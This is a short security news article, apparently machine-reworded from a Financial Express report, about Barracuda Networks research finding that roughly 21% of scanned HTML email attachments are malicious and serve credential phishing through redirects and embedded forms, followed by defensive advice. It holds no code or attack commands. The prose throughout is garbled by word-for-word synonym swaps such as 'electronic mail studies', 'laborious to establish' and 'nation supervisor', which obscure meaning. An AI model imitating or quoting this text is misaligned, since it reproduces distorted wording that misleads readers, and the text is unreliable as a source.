Researchers at IT safety agency Barracuda Networks just lately analysed knowledge on the tens of millions of attachments scanned by Barracuda programs over the previous month. They discovered virtually 21% of all HTML attachments scanned by the corporate to be malicious.
HTML attachments are generally used for electronic mail communication. These are significantly used for system-generated electronic mail studies that customers would possibly obtain often. These messages embody URL hyperlinks to the precise report. Attackers have been embedding HTML attachments in emails disguised as a weekly report, tricking customers into clicking on phishing hyperlinks. This is a profitable approach as a result of hackers not want to incorporate malicious hyperlinks in an electronic mail, permitting them to simply bypass anti-spam and anti-virus programs.
The malicious HTML attachments are getting used for credentials phishing. They embody a hyperlink to a phishing website, which, when opened, will get redirected to a third-party machine that requests the customers to enter their credentials to entry info or obtain a file which will comprise malware. Hackers don’t at all times have to create a pretend web site. They can create a phishing kind immediately embedded within the attachment, finally sending phishing websites as attachments as an alternative of hyperlinks.
“These attacks are difficult to detect because HTML attachments per se are not malicious,” says Parag Khurana, nation supervisor, Barracuda Networks India.
Attackers don’t embody malware within the attachment, as an alternative utilizing a number of redirects with Javascript libraries hosted elsewhere. “Potential protection against these attacks should take into account an entire email with HTML attachments, looking at all redirects and analysing the content of the email for malicious intent,” he provides.
Considering such attachments are laborious to establish precisely, machine studying and static code evaluation supply one of the best options to take care of them, as they consider an electronic mail to establish and block malicious HTML attachments. Meanwhile, given the quantity of such assaults, customers ought to be cautious of all HTML attachments, particularly these from sources they haven’t encountered earlier than.
In case malicious emails do get by way of, it’s essential to hold post-delivery remediation instruments able to rapidly establish and take away such emails from all consumer inboxes. Automated incident response may help do that rapidly earlier than assaults unfold by way of an organisation, and account takeover safety can monitor and alert the customers to suspicious account exercise if login credentials are compromised.
Source: www.financialexpress.com”